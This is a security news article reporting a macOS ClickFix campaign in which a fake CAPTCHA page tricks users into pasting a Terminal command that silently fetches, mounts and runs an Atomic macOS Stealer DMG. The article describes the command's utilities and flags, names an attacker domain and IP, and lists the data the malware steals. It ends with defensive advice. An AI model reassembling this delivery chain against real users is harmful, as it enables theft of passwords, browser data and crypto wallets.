A single Terminal command now suffices to download, mount, and launch a malicious DMG on macOS, all without the victim ever seeing a Finder icon. Palo Alto Networks Unit 42 uncovered this ClickFix campaign pushing Atomic macOS Stealer (AMOS), and the technique is a nasty step up from previous social engineering tricks.
Fake CAPTCHA Hides a Two-Line Payload ClickFix attacks have been around, but earlier versions required the user to manually open a downloaded DMG or double-click a script. This campaign collapses the entire infection chain into one step. The victim lands on a fake CAPTCHA page that instructs them to open Terminal and paste a command to verify they are human. That command does three things: downloads a malicious DMG from svs-verificationdate beer using curl -fsSL, saves it to /tmp under a random filename, then runs hdiutil attach -nobrowse to mount the disk image without showing it in Finder or on the desktop. The script then digs up to three directory levels deep for the first .app or .pkg bundle and launches it with open. Unit 42 observed the DMG named s.01M0td.dmg containing a self-signed application bundle NNApp.app. That app is AMOS, a known infostealer that has been circulating since at least mid-2023.
AMOS Strips Browsers, Wallets, and Native macOS Vaults AMOS targets eight Chromium-based browsers: Google Chrome, Microsoft Edge, Brave, Opera, Arc, Vivaldi, CocCoc, and Yandex. It steals cookies, login databases, autofill data, stored payment cards, and browser profiles. For Firefox-derived browsers (LibreWolf, SeaMonkey, Tor Browser, Waterfox, Zen Browser) it grabs the same categories. The malware also scrapes Safari cookies and Apple Keychain database files. Cryptocurrency wallet support is extensive: Exodus, Electrum, Atomic Wallet, Wasabi Wallet, Bitcoin Core, Litecoin Core, DashCore, Guarda, Binance Wallet, Dogecoin Wallet, and TonKeeper. Worse, AMOS replaces legitimate installations of Ledger Live and Trezor Suite with malicious versions, likely to intercept crypto transactions. Telegram Desktop and Discord data are fair game. Apple Notes databases are exfiltrated. User documents with PDF, TXT, or RTF extensions are harvested. All stolen data gets packed into a ZIP archive and uploaded to the attacker-controlled server at 196.251.107 171. One particularly insidious detail: AMOS displays a fake System Preferences authentication prompt to trick users into typing their macOS password. That password gives the malware access to Keychain and other protected stores.
The Real Problem Is Trusting Terminal Commands The attack succeeds because users are conditioned to trust official-looking dialogs. No browser exploit, no zero-day - just a social engineering prompt that feels routine. The command itself uses standard macOS utilities (curl, hdiutil, open) that any sysadmin would recognize. There is nothing in the syntax that screams "malware" to a non-technical user. If you ever see a website telling you to open Terminal and paste a command, do not do it. Even CAPTCHA pages that look legitimate can hide this kind of payload. Understand every flag in a command before running it. With -nobrowse and -fsSL, the attacker ensured the infection stays invisible to casual inspection. This technique will almost certainly be adopted by other threat actors because it requires minimal changes to existing ClickFix templates and works on any macOS version that ships with hdiutil. Expect more campaigns leveraging silent DMG mounting as the default delivery vector for macOS infostealers.
Source: New macOS ClickFix attack silently mounts DMGs to push infostealer
Domain: bleepingcomputer.com
Comments load interactively on the live page.